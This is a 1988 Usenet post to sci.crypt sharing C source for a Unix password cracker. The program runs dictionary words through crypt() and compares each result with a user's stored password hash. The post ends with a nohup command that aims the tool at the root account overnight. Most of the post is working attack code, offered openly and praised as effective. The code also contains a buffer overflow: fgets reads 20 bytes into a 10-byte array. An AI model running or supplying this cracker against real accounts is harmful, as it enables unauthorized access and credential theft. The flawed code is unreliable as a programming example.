Path: utzoo!utgpu!water!watmath!clyde!cbosgd!ihnp4!gargoyle!ddsw1!dnelson
From: dnelson@ddsw1.UUCP (Douglas Nelson)
Newsgroups: sci.crypt
Subject: Unix Password Hacker
Message-ID: <731@ddsw1.UUCP>
Date: 16 Feb 88 00:01:34 GMT
Reply-To: dnelson@ddsw1.UUCP (Douglas Nelson)
Distribution: na
Organization: Traveller's Aid, Mundelein, IL
Lines: 120


Many people left me mail about this (simple) program that brute force hacks
at the /etc/passwd file on about any compiling unix using the /usr/dict/words
or any other type of dictionary file.  Take a look at the source, as it is
quite simple, yet very effective:

Cut Here--------------------------------------------------------------

#include <stdio.h>
#include <pwd.h>
#include <signal.h>



struct     passwd *pwd;

int   len, abort(), endpwent();

char  crbuf[30], *strcpy(), *crypt(), *getpass(), *getlogin(), *pw, pwbuf[10];



main(argc, argv)

int argc;

char *argv[];

{

FILE *fopen(), *fp;

char *uname;

signal(SIGINT,abort);

if (argc !=3) {

     printf("usage : %s username pwfile\n",argv[0]);

     exit(-1);

     }

if (!(pwd =getpwnam(argv[1]))) {

     printf("unknown user : %s\n",argv[1]);

     exit(-1);

     }

if ((fp = fopen(argv[2], "r")) == NULL) {

     perror(argv[2]);

     exit(-1);

     }

sprintf(crbuf,"%s",pwd->pw_passwd);

printf("hacking %s\n",argv[1]);

printf("encrypted password : %s\n",crbuf);

while (fgets(pwbuf, 20, fp) != NULL) {

     pwbuf[strlen(pwbuf)-1] = '\0';

     pw = crypt(pwbuf,crbuf);

     if (!strcmp(pw,crbuf)) {

     printf("%s ==> %s\n",argv[1],pwbuf);

     exit(0);

     }

     }

printf("done -- password not found.\n");

     endpwent();

}

abort()

{

printf("aborted while trying '%s'\n",pwbuf);

exit(-1);

}


Cut Here--------------------------------------------------------------


...as you can see, it is quite simple, but amazingly effective.  Compiles on
just about anything.  I would imagine you could use 'nohup' if needed and
envoke it as a process and pipe output to a text file and run it overnight, ie:

$ nohup hpw root /usr/dict/words > pass.txt &



I'm always welcoming any private mail discussions on this type of thing!


-Doug


------------------
Douglas Nelson
dnelson@ddsw1.UUCP
------------------